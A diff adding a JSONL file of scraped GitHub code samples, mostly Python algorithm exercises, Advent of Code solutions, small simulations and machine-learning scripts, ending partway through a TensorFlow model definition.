diff --git "a/4109.jsonl" "b/4109.jsonl"
new file mode 100644
--- /dev/null
+++ "b/4109.jsonl"
@@ -0,0 +1,1102 @@
+{"seq_id":"2725417317","text":"\ndef CountRectangles(rectangles):\n\n    s_d = []\n\n    for l,w in rectangles:\n        s_d.append(min(l,w))\n\n    maxLen = max(s_d)\n    count = 0\n\n    for d in s_d:\n        if d == maxLen:\n            count +=1\n    return count\n\n\nrect = [[5,8],[3,9],[5,12],[16,5]]\nprint(CountRectangles(rect))","repo_name":"AnmolSahu24/Python-DSA","sub_path":"Array/1725.No. of Rectangles that can form largest square.py","file_name":"1725.No. of Rectangles that can form largest square.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74606519772","text":"class Solution:\n    def confusingNumber(self, n: int) -> bool:\n        d = {'0':'0','1':'1','6':'9','8':'8','9':'6'}\n        a = str(n)\n        b = ''\n        for i in a:\n            if i not in d:\n                return False\n            else:\n                b += d[i]\n        b = b[::-1]\n        if a == b:\n            return False\n        return True","repo_name":"kevinjshah2207/LeetCode_Summer_21","sub_path":"confusing-number/confusing-number.py","file_name":"confusing-number.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"10758472682","text":"commands = []\nforward = []\ndown = []\nup = []\n\nforward_values = []\ndown_values = []\nup_values = []\n\nforward_total = 0\ndown_total = 0\nup_total = 0\n\nwith open('AoC-2021/Day 2/input2.txt') as f:\n    for line in f:\n        commands.append(line.strip())\n\nfor command in commands:\n    if 'forward' in command:\n        forward.append(command.split()) # Splits the word \"forward\" and value \n    if 'down' in command:\n        down.append(command.split()) # Splits the word \"down\" and value \n    if 'up' in command:\n        up.append(command.split()) # Splits the word \"up\" and value \n\nfor command in forward:\n    command.pop(0) # Removes the word \"forward\" leaving only the value\n    forward_values.append(int(command[0])) # Converts values to int and appends them to a new list\nfor command in down:\n    command.pop(0) # Removes the word \"down\" leaving only the value\n    down_values.append(int(command[0]))\nfor command in up: \n    command.pop(0) # Removes the word \"up\" leaving only the value\n    up_values.append(int(command[0]))\n\nforward_total = sum(forward_values) # Adds all forward values\ndown_total = sum(down_values) # Adds all down values\nup_total = sum(up_values) # Adds all up values\n\ndepth = down_total - up_total # \"up\" values decrease the depth, so they are subtracted\nresult = forward_total * depth\n\nprint(result)","repo_name":"nicholasmascioni/AoC-2021","sub_path":"Day 2/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13029497199","text":"from collections import deque\n\ndef breadth_first_search(graph, name):\n    result = None\n    search_queue = deque()\n    search_queue += graph[name]\n    searched_already = []\n    while search_queue:\n        person = search_queue.popleft()\n        if person_is_seller(person):\n            return person\n        else:\n            searched_already.append(person)\n            search_queue += graph[person]\n\n    return result\n\ndef person_is_seller(person):\n    return person[-1] == 
\"m\"\n","repo_name":"sebostian/Python","sub_path":"Misc/BreadthFirstSearch.py","file_name":"BreadthFirstSearch.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41691046474","text":"from itertools import count, islice\r\nfrom math import sqrt\r\n\r\ndef is_prime(n):\r\n\t\"\"\" Determine whether a number n is prime. \"\"\"\r\n\treturn n > 1 and all(n % i for i in islice(count(2), int(sqrt(n) - 1)))\r\n\t\r\nsum_ = 0\r\nfor i in range(2, 2000000):\r\n\tif is_prime(i):\r\n\t\tsum_ += i\r\n\t\t\r\nprint(sum_)","repo_name":"xenoicwyce/project-euler","sub_path":"p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29464157192","text":"import cairosvg\nimport io\nimport matplotlib.pyplot as plt\nimport minishogilib\nimport numpy as np\nimport PIL\nimport simplejson\nimport sys\n\n\ndef main():\n record_path = sys.argv[1]\n\n target_positions = [\n ['4e4d'],\n ['2e3d'],\n ['2e4c'],\n ['3e2d'],\n ['3e4d'],\n ['3e3d'],\n ['2e1d']\n ]\n\n position_counts = [0 for _ in target_positions]\n position_frequency = [[] for _ in target_positions]\n\n sample_iter = 200\n\n with open(record_path) as f:\n counter = 0\n\n while True:\n line = f.readline()\n\n if not line:\n break\n\n data = simplejson.loads(line)\n\n for (i, target_position) in enumerate(target_positions):\n if data['sfen_kif'][:len(target_position)] == target_position:\n position_counts[i] += 1\n\n counter += 1\n\n if counter == sample_iter:\n for i in range(len(target_positions)):\n position_frequency[i].append(position_counts[i] / counter)\n\n position_counts = [0 for _ in target_positions]\n counter = 0\n\n elements = []\n elements.append('')\n elements.append('')\n elements.append('')\n elements.append('Analyzer')\n elements.append('')\n elements.append('')\n\n elements.append('')\n for (i, pf) in enumerate(position_frequency):\n plt.clf()\n\n position = minishogilib.Position()\n position.set_start_position()\n\n for m in target_positions[i]:\n move = position.sfen_to_move(m)\n position.do_move(move)\n\n elements.append('')\n\n elements.append('')\n\n plt.ylim([0, 100])\n plt.grid(linestyle='--')\n y = np.array(pf) * 100\n plt.scatter(range(len(pf) * sample_iter)[::sample_iter], y, s=2)\n\n f = io.BytesIO()\n plt.savefig(f, format='svg')\n elements.append('')\n\n elements.append('')\n\n elements.append('
')\n        elements.append(position.to_svg())\n        elements.append('')\n        elements.append(f.getvalue().decode('utf-8'))\n        elements.append('
')\n\n elements.append('')\n elements.append('')\n\n with open('./index.html', 'w') as html:\n html.write('\\n'.join(elements))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nyashiki/erweitern_55","sub_path":"tools/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"34750948613","text":"class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def treeToDoublyList(self, root: 'Node') -> 'Node':\n self.head = None\n self.tail = None\n def dfs(node):\n if node is None:\n return\n\n dfs(node.left)\n node = root\n if self.head is None:\n self.head = root\n else:\n self.tail.next = node\n node.left = self.tail\n\n self.tail = node\n dfs(node.right)\n\n dfs(root)\n return self.head\n\n\n","repo_name":"anki08/Leetcode-Solutions","sub_path":"Tree/tree-to-DLL.py","file_name":"tree-to-DLL.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"28546162237","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom . import geom\n\n# PRBM\nt_30 = 0.83\nt_15 = 0.45\nt_10 = 0.27\nang_min = 15/180*np.pi\ntr = np.sum([t_30,0.015,0.05,0.015])/1000\nwr = 0.01\ngamma = 0.85\nKtheta = 2.65\nE = 1.5*1e6*6894.76\n\ndef prbm_k(t,l,w):\n I = w*t**3/12\n k = gamma*Ktheta*E*I/l\n return k\n\ndef tf(ct):\n return t_15/1000 if ct > 0 else t_10/1000\n\ndef sim(x,r,plot=False):\n ls = x[:4]\n cm = x[4]\n ct = x[5]\n wf = x[6]\n\n k = prbm_k(tf(ct),ls[1],wf)\n lk = geom.spring(0,ls,cm)\n\n lks = []\n angs = np.linspace(0,r,50)\n taus = []\n for ang in angs:\n lk = geom.spring(ang,ls,cm)\n theta = geom.pose(lk[2])[1]\n alpha = geom.pose(lk[1])[1]\n beta = geom.pose(lk[0])[1]\n assert np.abs(beta) > ang_min, 'angle between motor arm and crank too small'\n\n # Static analysis\n dtheta = geom.limit_ang(theta-np.pi)\n tauk = k*dtheta\n f_ang = geom.limit_ang(alpha-theta)\n assert np.abs(geom.limit_ang(np.pi-f_ang)) > ang_min, 'angle between flexible beam and coupler too small'\n f = tauk/(ls[1]*gamma+geom.pade)/np.sin(f_ang)\n fp_ang = geom.limit_ang(np.pi+alpha-beta)\n tau = f*np.sin(fp_ang)*ls[3]\n\n # print(theta,alpha,beta,dtheta,f_ang,fp_ang)\n taus.append(tau)\n lks.append(lk)\n\n angs = np.array(angs)\n taus = np.array(taus)\n\n if plot:\n lks_r = [lks[int(n)] for n in np.linspace(0,len(lks)-1,3)]\n bbox = geom.bbox(lks_r)\n plt.figure()\n plt.axis('scaled')\n plt.xlim(bbox[:2])\n plt.ylim(bbox[2:])\n\n for lk in lks_r:\n for link in lk:\n plt.plot(link[:,0],link[:,1],'.-k')\n\n return angs,taus\n","repo_name":"iicfcii/laminate-jumping-leg","sub_path":"anchor/stiffness.py","file_name":"stiffness.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38045168426","text":"\nclass Sensor:\n def __init__(self, pos, beacon):\n self.pos = pos\n self.beacon = beacon\n self.cov = self.get_dist(beacon)\n\n def get_dist(self, z):\n return abs(self.pos[0] - z[0]) + abs(self.pos[1] - z[1])\n\n def cover(self, z):\n return self.get_dist(z) <= self.cov\n\n def covery(self, y):\n return self.get_dist((self.pos[0], y)) <= self.cov\n\nwith open(\"input\", \"r\") as f:\n \n sensors = []\n for line in f.readlines():\n a = line.strip().split(\"=\") \n sensor = (int(a[1].split(\",\")[0]), 
int(a[2].split(\":\")[0]))\n beacon = (int(a[3].split(\",\")[0]), int(a[4]))\n sensors.append(Sensor(sensor, beacon))\n\ndef merge_intervals(intvs):\n intvs.sort(key=lambda x: x[0])\n new_intvs = []\n i = 0\n j = 1\n \n while i < len(intvs):\n v = intvs[i]\n while j < len(intvs):\n if v[1] >= intvs[j][0] - 1:\n v[1] = max(v[1], intvs[j][1])\n j += 1\n else:\n break\n i = j\n j += 1\n new_intvs.append(v)\n\n return new_intvs\n\nxlim = [0, 4000000]\nylim = [0, 4000000]\n\npos = [0, 0]\npoint = []\nfor y in range(ylim[1]):\n intervals = []\n for i, s in enumerate(sensors):\n if s.covery(y):\n d = s.cov - abs(y - s.pos[1])\n intervals.append([s.pos[0] - d, s.pos[0] + d]) \n v = merge_intervals(intervals)\n \n if len(v) > 1:\n for i in range(len(v)-1):\n if v[i][1] < xlim[0] or v[i+1][0] > xlim[1]-1:\n continue \n elif v[i+1][0] - v[i][1] == 2:\n point = [v[i][1]+1, y] \n break\n else:\n raise Exception(\"More than 1 possible points\")\n\n if point:\n break\n\nprint(\"15b tuning frequency {}\".format(point[0]*4000000+point[1]))\n","repo_name":"JohanRuuskanen/aoc22","sub_path":"15/15b.py","file_name":"15b.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70152829853","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport parsing\nimport display\nimport normalization\nimport gradient_descent\nimport math\n\n# ===================== Initialization =====================\nNormalize = True\nDebug_gradient = False\nDisplay_graph = True\nDisplay_predictions = False\nAdjust_learning_rate = True\nlearning_rate = 0.1 if Normalize == True else 0.000000000015\niterations = 500\n\n# Parsing :\nthetas = parsing.read_thetas()\nraw_dataX, raw_dataY = parsing.read_data()\ndataX, dataY, thetas = normalization.process_data(raw_dataX, raw_dataY, thetas, Normalize)\n\n# Formating new variables :\nx, y = np.array(dataX), np.array(dataY)\nx, y = x.reshape(x.shape[0], 1), y.reshape(y.shape[0], 1)\nX = np.hstack((x, np.ones(x.shape)))\nY = y\nthetas.reverse()\ntheta = np.array(thetas)\ntheta = theta.reshape(theta.shape[0], 1)\n\n# ===================== Start output =====================\ndisplay.start_output(raw_dataX, raw_dataY, X, Y, theta, Normalize)\n\n# ===================== Gradient descent =====================\ntheta, prediction_history = gradient_descent.gradient_descent(X, Y, theta, learning_rate, \\\n iterations, Debug_gradient, Adjust_learning_rate)\n\n# ===================== Data graph =====================\ndisplay.display_graph(dataX, dataY, prediction_history, Display_graph)\n\n# ===================== Denormalizing =====================\nX, Y, final_theta = normalization.denormalize(raw_dataX, raw_dataY, X, Y, theta, Normalize)\n\n# ===================== End output =====================\ndisplay.end_output(final_theta, gradient_descent.cost_function(X, Y, final_theta), X, Display_predictions)\n\n# ===================== Writing new thetas to file =====================\nparsing.write_thetas([final_theta[1][0], final_theta[0][0]])\n","repo_name":"alacrois/42-ft_linear_regression","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28542356066","text":"import webbrowser\n\n\nclass Movie():\n # Saving variable below for future enhancements\n # VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n # Constructor called from each Instance\n def 
__init__(self,\n movie_title,\n movie_storyline,\n movie_actors,\n poster_image,\n trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.actors = movie_actors\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n # Instance Method or Function\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url)\n","repo_name":"jeffmicha3ls/movieTrailerProject","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13586165800","text":"# -*-coding:UTF-8 -*\nimport pickle\nfrom Game import *\nfrom Neuron import *\nfrom Player import *\n\nwith open('reseau_neuronal', 'rb') as inp: ns = pickle.load(inp)\n\ngame = Game(15)\n\nchaine = str()\nwhile chaine.lower() != \"q\":\n print(\"Tapez 'Q' pour quitter...\")\n\n print(\"Tapez votre nom de joueur : \")\n chaine = input()\n if chaine.lower() != \"q\":\n player = HumanPlayer(chaine)\n print(\"Bienvenue \", chaine, \" !\")\n\n print(\"Tapez votre mode de jeu (easy, medium, ou hard) : \")\n chaine = input()\n if chaine.lower() in (\"easy\",\"medium\",\"hard\"):\n cpuPlayer = CPUPlayer('Terminator', chaine.lower(), 15)\n cpuPlayer.setNeuronNetwork(ns)\n game.start(cpuPlayer, player, True)\n","repo_name":"DecampsRenan/batongame","sub_path":"classes/finalGame.py","file_name":"finalGame.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23391907131","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimg = cv2.imread(\"../images/sunflower.jpg\", 0)\n\n# show gray scale image\n'''opencv'''\ncv2.imshow(\"img_gray\", img)\ncv2.waitKey()\n\n'''plt'''\nfig = plt.figure()\nax = fig.add_subplot(121)\nax.imshow(img, cmap=\"gray\")\n\nax = fig.add_subplot(122)\nax.imshow(img, cmap=\"gray\", vmin=0, vmax=255)\nplt.show()\n# ------------------------------------------------\n","repo_name":"suzumiyayuhi/traditional_CV_learning","sub_path":"image_processing/chapter2/show_gray_scale_image.py","file_name":"show_gray_scale_image.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31233092952","text":"import argparse\nimport tqdm\n\nimport torch\nimport pytorch_categorical\nfrom torch.utils.data import DataLoader\nimport os\nimport pytorch_categorical\nfrom multiprocessing import Process, Manager\nfrom embedding_tools.poincare_embeddings_graph import RiemannianEmbedding as PEmbed\nfrom em_tools.poincare_em import RiemannianEM as PEM\nfrom data_tools import corpora_tools\nfrom data_tools import corpora\nfrom data_tools import data_tools\nfrom evaluation_tools import evaluation\nfrom visualisation_tools import plot_tools\nfrom launcher_tools import logger\nfrom optim_tools import optimizer\n\nparser = argparse.ArgumentParser(description='Start an experiment')\nparser.add_argument('--n-disc', metavar='d', dest=\"n_disc\", type=int, default=1,\n help=\"Number of disc used in the experiment\")\nparser.add_argument('--init-lr', dest=\"init_lr\", type=float, default=-1.0,\n help=\"Learning rate for the first embedding step\")\nparser.add_argument('--lr', dest=\"lr\", type=float, default=1,\n help=\"learning rate for embedding\")\nparser.add_argument('--init-alpha', dest=\"init_alpha\", type=float, default=-1.0,\n help=\"alpha for the first embedding 
step\")\nparser.add_argument('--alpha', dest=\"alpha\", type=float, default=.1,\n help=\"alpha for embedding\")\nparser.add_argument('--init-beta', dest=\"init_beta\", type=float, default=-1.0,\n help=\"beta for the first embedding step\")\nparser.add_argument('--beta', dest=\"beta\", type=float, default=1,\n help=\"beta for embedding\")\nparser.add_argument('--gamma', dest=\"gamma\", type=float, default=1,\n help=\"gamma rate for embedding\")\nparser.add_argument('--n-gaussian', dest=\"n_gaussian\", type=int, default=12,\n help=\"number of gaussian for EM algorithm\")\nparser.add_argument('--dataset', dest=\"dataset\", type=str, default=\"football\",\n help=\"dataset to use for the experiments\")\nparser.add_argument('--walk-lenght', dest=\"walk_lenght\", type=int, default=20,\n help=\"size of random walk\")\nparser.add_argument('--cuda', dest=\"cuda\", action=\"store_true\", default=False,\n help=\"using GPU for operation\")\nparser.add_argument('--epoch', dest=\"epoch\", type=int, default=1,\n help=\"number of loops alternating embedding/EM\")\nparser.add_argument('--epoch-embedding-init', dest=\"epoch_embedding_init\", type=int, default=100,\n help=\"maximum number of epoch for first embedding gradient descent\")\nparser.add_argument('--epoch-embedding', dest=\"epoch_embedding\", type=int, default=10,\n help=\"maximum number of epoch for embedding gradient descent\")\nparser.add_argument('--id', dest=\"id\", type=str, default=\"0\",\n help=\"identifier of the experiment\")\nparser.add_argument('--save', dest=\"save\", action=\"store_true\", default=True,\n help=\"saving results and parameters\")\nparser.add_argument('--precompute-rw', dest='precompute_rw', type=int, default=10,\n help=\"number of random path to precompute (for faster embedding learning) if negative \\\n the random walks is computed on flight\")\nparser.add_argument('--context-size', dest=\"context_size\", type=int, default=4,\n help=\"size of the context used on the random walk\")\nparser.add_argument(\"--negative-sampling\", dest=\"negative_sampling\", type=int, default=10,\n help=\"number of negative samples for loss O2\")\nparser.add_argument(\"--embedding-optimizer\", dest=\"embedding_optimizer\", type=str, default=\"exphsgd\", \n help=\"the type of optimizer used for learning poincaré embedding\")\nparser.add_argument(\"--em-iter\", dest=\"em_iter\", type=int, default=0,\n help=\"Number of EM iterations\")\nparser.add_argument(\"--batch-size\", dest=\"batch_size\", type=int, default=512,\n help=\"Batch number of elements\")\n \nargs = parser.parse_args()\n\n\ndataset_dict = { \"karate\": corpora.load_karate,\n \"football\": corpora.load_football,\n \"flickr\": corpora.load_flickr,\n \"dblp\": corpora.load_dblp,\n \"books\": corpora.load_books,\n \"blogCatalog\": corpora.load_blogCatalog\n }\n\noptimizer_dict = {\"addhsgd\": optimizer.PoincareBallSGDAdd,\n \"exphsgd\": optimizer.PoincareBallSGDExp,\n \"hsgd\": optimizer.PoincareBallSGD,\n \"exphsga\": optimizer.PoincareBallSGAExp}\n\n\nif(args.save):\n print(\"The following options are use for the current experiment \", args)\n os.makedirs(\"RESULTS/\"+args.id+\"/\", exist_ok=True)\n logger_object = logger.JSONLogger(\"RESULTS/\"+args.id+\"/log.json\")\n logger_object.append(vars(args))\n\n# check if dataset exists\n\nif(args.dataset not in dataset_dict):\n print(\"Dataset \" + args.dataset + \" does not exist, please select one of the following : \")\n print(list(dataset_dict.keys()))\n quit()\n\nif(args.embedding_optimizer not in optimizer_dict):\n 
print(\"Optimizer \" + args.embedding_optimizer + \" does not exist, please select one of the following : \")\n print(list(optimizer_dict.keys()))\n quit()\n\nif(args.init_lr <= 0):\n args.init_lr = args.lr\nif(args.init_alpha < 0):\n args.init_alpha = args.alpha\nif(args.init_beta < 0):\n args.init_beta = args.beta\n\nalpha, beta = args.init_alpha, args.init_beta\n\nprint(\"Loading Corpus \")\nD, X, Y = dataset_dict[args.dataset]()\nprint(\"Creating dataset\")\n# index of examples dataset\ndataset_index = corpora_tools.from_indexable(torch.arange(0,len(D),1).unsqueeze(-1))\nprint(\"Dataset Size -> \", len(D))\nD.set_path(False)\n\n# negative sampling distribution\nfrequency = D.getFrequency()**(3/4)\nfrequency[:,1] /= frequency[:,1].sum()\nfrequency = pytorch_categorical.Categorical(torch.ones(len(frequency))/len(frequency))\n# random walk dataset\nd_rw = D.light_copy()\nd_rw.set_walk(args.walk_lenght, 1.0)\nd_rw.set_path(True)\nd_rw = corpora.ContextCorpus(d_rw, context_size=args.context_size, precompute=args.precompute_rw)\n# neigbhor dataset\nd_v = D.light_copy()\nd_v.set_walk(1, 1.0)\n\nprint(d_rw[1][0].size())\n\nprint(\"Merging dataset\")\nembedding_dataset = corpora_tools.zip_datasets(dataset_index,\n corpora_tools.select_from_index(d_v, element_index=0),\n d_rw\n )\ntraining_dataloader = DataLoader(embedding_dataset, \n batch_size=args.batch_size, \n shuffle=True,\n num_workers=8,\n collate_fn=data_tools.PadCollate(dim=0),\n drop_last=False\n )\n\nrepresentation_d = []\npi_d = []\nmu_d = []\nsigma_d = []\ndisc_log = {}\nfor disc in range(args.n_disc):\n alpha, beta = args.init_alpha, args.init_beta\n embedding_alg = PEmbed(len(embedding_dataset), lr=args.init_lr, cuda=args.cuda, negative_distribution=frequency,\n optimizer_method=optimizer_dict[args.embedding_optimizer])\n em_alg = PEM(args.n_gaussian, init_mod=\"kmeans-hyperbolic\", verbose=True)\n pi, mu, sigma = None, None, None\n pik = None\n epoch_embedding = args.epoch_embedding_init\n log_sigma = []\n for i in tqdm.trange(args.epoch):\n if(i==1):\n embedding_alg.set_lr(args.lr)\n alpha, beta = args.alpha, args.beta\n epoch_embedding = args.epoch_embedding\n\n embedding_alg.fit(training_dataloader, alpha=alpha, beta=beta, gamma=args.gamma, max_iter=epoch_embedding,\n pi=pik, mu=mu, sigma=sigma, negative_sampling=args.negative_sampling)\n em_alg.fit(embedding_alg.get_PoincareEmbeddings().cpu(), max_iter=args.em_iter)\n pi, mu, sigma = em_alg.getParameters()\n pik = em_alg.getPik(embedding_alg.get_PoincareEmbeddings().cpu())\n\n representation_d.append(embedding_alg.get_PoincareEmbeddings().cpu())\n pi_d.append(pi)\n mu_d.append(mu)\n sigma_d.append(sigma)\n current_accuracy = evaluation.accuracy_cross_validation(representation_d[-1], D.Y, pi, mu, sigma, 5, verbose=False)\n print(\"\\nPerformances disc \"+str(disc+1)+\"-> \" ,current_accuracy,\"\\n\")\n if(args.save):\n logger_object.append({\"disc-\"+str(disc):{\"accuracy\": current_accuracy}})\n\n#evaluate performances on all disc\ntotal_accuracy = evaluation.accuracy_disc_product(representation_d, D.Y, pi_d, mu_d, sigma_d, verbose=False)\nprint(\"\\nPerformances joined -> \" ,\n total_accuracy\n)\nlogger_object.append({\"accuracy\": total_accuracy})\n#evaluate performances on all disc\ntotal_accuracy = evaluation.accuracy_disc_kmeans(representation_d[0], D.Y, mu_d[0], verbose=False)\nprint(\"\\nPerformances kmeans-> \" ,\n total_accuracy\n)\nlogger_object.append({\"accuracy_kmeans\": total_accuracy})\n#TODO: Clean the code below\n\nif(args.save):\n import matplotlib.pyplot 
as plt\n import matplotlib.colors as plt_colors\n import numpy as np\n torch.save(representation_d, \"RESULTS/\"+args.id+\"/embeddings.t7\")\n torch.save( {\"pi\": pi_d, \"mu\":mu_d, \"sigma\":sigma_d}, \"RESULTS/\"+args.id+\"/pi_mu_sigma.t7\")\n unique_label = np.unique(sum([ y for k, y in D.Y.items()],[]))\n colors = []\n\n for i in range(len(representation_d[0])):\n colors.append(plt_colors.hsv_to_rgb([D.Y[i][0]/(len(unique_label)),0.5,0.8]))\n\n\n\n plot_tools.plot_embedding_distribution_multi(representation_d, pi_d, mu_d, sigma_d, \n labels=None, N=100, colors=colors, \n save_path=\"RESULTS/\"+args.id+\"/fig.pdf\")\n\n\n print({\"pi\": pi_d, \"mu\":mu_d, \"sigma\":sigma_d})\n\n","repo_name":"tgeral68/EuuzAIiFDS","sub_path":"launcher_tools/experiment_disc_prod.py","file_name":"experiment_disc_prod.py","file_ext":"py","file_size_in_byte":9770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34751249893","text":"import numpy as np\nclass Solution:\n def maxProfit(self, prices):\n n = len(prices)\n buy_dp = np.zeros((n+1), dtype=int)\n sell_dp = np.zeros((n+1), dtype=int)\n buy_dp[0] = -prices[0]\n sell_dp[0] = 0\n for i in range(1, len(prices)+1):\n buy_dp[i] = max(buy_dp[i-1], -prices[i-1])\n sell_dp[i] = max(sell_dp[i-1], buy_dp[i-1]+prices[i-1])\n return sell_dp[-1]\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.maxProfit(prices = [7,1,5,3,6,4]))\n","repo_name":"anki08/Leetcode-Solutions","sub_path":"miscelleneous/buy_and_sell_stocks.py","file_name":"buy_and_sell_stocks.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14538199744","text":"#%%\ndef sort_012(input_list):\n '''\n left_idx tracks the location of 1st 1 and\n right_idx tracks the location of the 1st 2.\n Using the scanning_idx, this iterates over every element once O(n) and allocate (in-place)\n all 0s to the left of the 1s,\n and all 2s to the right of the 1s.\n Therefore the overall time complexity is 0(n).\n\n '''\n left_idx = 0\n right_idx = len(input_list) - 1\n scanning_idx = 0\n\n while scanning_idx <= right_idx:\n if input_list[scanning_idx] == 0:\n input_list[left_idx], input_list[scanning_idx] = input_list[scanning_idx], input_list[left_idx],\n scanning_idx += 1\n left_idx += 1\n\n elif input_list[scanning_idx] == 1:\n scanning_idx += 1\n elif input_list[scanning_idx] == 2:\n input_list[right_idx], input_list[scanning_idx] = input_list[scanning_idx], input_list[right_idx]\n right_idx -= 1\n\n return input_list\n\n\ndef testUdacity():\n test1 = [0, 0, 2, 2, 2, 1, 1, 1, 2, 0, 2]\n test2 = [2, 1, 2, 0, 0, 2, 1, 0, 1, 0, 0, 2, 2, 2, 1, 2, 0, 0, 0, 2, 1, 0, 2, 0, 0, 1]\n test3 = [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2]\n assert sort_012(test1) == sorted(test1)\n assert sort_012(test2) == sorted(test2)\n assert sort_012(test3) == sorted(test3)\n\ndef testEdgeCase1():\n '''If input is an empty arr'''\n assert sort_012([]) == [], 'Empty array should return empty array'\n\ndef testEdgeCase2():\n '''if input only contains 0, 1 or 2'''\n assert sort_012([0,0,0,0,0]) == [0,0,0,0,0], f'Should return all 0s, but {sort_012([0,0,0,0,0])} was returned'\n assert sort_012([1 for i in range(1,10)]) == [1 for i in range(1,10)], f'Should return all 1s, but {sort_012([1 for i in range(1,10)])} was returned'\n assert sort_012([2 for i in range(1,10)]) == [2 for i in range(1,10)], f'Should return all 2s, but {sort_012([2 for i in 
range(1,10)])} was returned'\n\nif __name__ == '__main__':\n testEdgeCase1()\n testEdgeCase2()\n testUdacity()\n","repo_name":"CephasTanLJ/Udacity_DataStructNAlg_3","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29050561630","text":"import pandas as pd\r\nimport numpy as np\r\nfrom basic_layer.NN_adam import NN\r\nfrom util.batcher import batcher\r\nfrom basic_layer.VRNN import VRNN\r\nfrom basic_layer.LSTMs import bi_lstm_layer as lstm_layer\r\nfrom basic_layer.Self_Attention import Self_Attention\r\nfrom data.datahandle import input_prepare\r\nfrom data.output_handel import output_handle\r\n# import tensorflow.compat.v1 as tf\r\n# tf.disable_v2_behavior()\r\nimport tensorflow as tf\r\nimport numpy.linalg as npl\r\n\r\nclass DMAN(NN):\r\n def __init__(self, config): #定义超参数,从配置文件调入其他参数\r\n super(DMAN, self).__init__(config)\r\n self.seqlen = 12\r\n self.block_len = 6\r\n self.block_num = 5\r\n self.history_num = 25\r\n self.all_block_len = self.block_len*self.block_num\r\n self.test_loss = [9999] * 20\r\n if config != None:\r\n self.edim = config['edim']\r\n self.label_dim = config['label_dim']\r\n self.epoch = config['nepoch']\r\n self.fmy_output_path = config['fmy_output_path']\r\n self.model_save_path = config['model_save_path']\r\n self.batch_size = config['batch_size']\r\n self.gpu_num = config['gpu_num']\r\n self.model_name = config['model_name']\r\n else:\r\n self.edim = None\r\n self.label_dim = None\r\n self.epoch = None\r\n self.fmy_output_path = None\r\n self.model_save_path = None\r\n self.batch_size = None\r\n self.gpu_num = None\r\n self.model_name = None\r\n\r\n def set_placeholder(self): #定义网络输入和输出的形状格式\r\n self.inputs = tf.placeholder(\r\n tf.float32,\r\n [None, None, self.all_block_len, self.edim], # [batch_sie, sequence_len, 15, 29]\r\n name=\"inputs\"\r\n )\r\n\r\n self.labels = tf.placeholder(\r\n tf.float32,\r\n [None, None, self.label_dim], # [bathc_size, sequence_len, label_dim]\r\n name=\"labels\"\r\n )\r\n\r\n shape = tf.shape(self.inputs)\r\n batch_size = shape[0]\r\n sequence_len = shape[1]\r\n print('label3')\r\n print(shape)\r\n \r\n self.reshape_inputs = tf.reshape(self.inputs, [batch_size, sequence_len, -1, self.block_len, self.edim]) # [batch_sie, sequence_len, 5, 3, edim]\r\n\r\n return self.reshape_inputs, self.labels\r\n\r\n def lstm_layer1(self, inputs): #定义底层LSTM(下采样层),return_sequence = ?\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 3, 29]\r\n output: [batch_sie, sequence_len, 5, 3, 64]\r\n \"\"\"\r\n with tf.variable_scope('layer1'):\r\n shape = tf.shape(inputs) # inputs: [batch_sie, sequence_len, 5, 3, 29]\r\n num1, num2, num3 = shape[0], shape[1], shape[2]\r\n\r\n inputs = tf.reshape(inputs, [num1*num2*num3, -1, 29])\r\n lstm_output, _ = 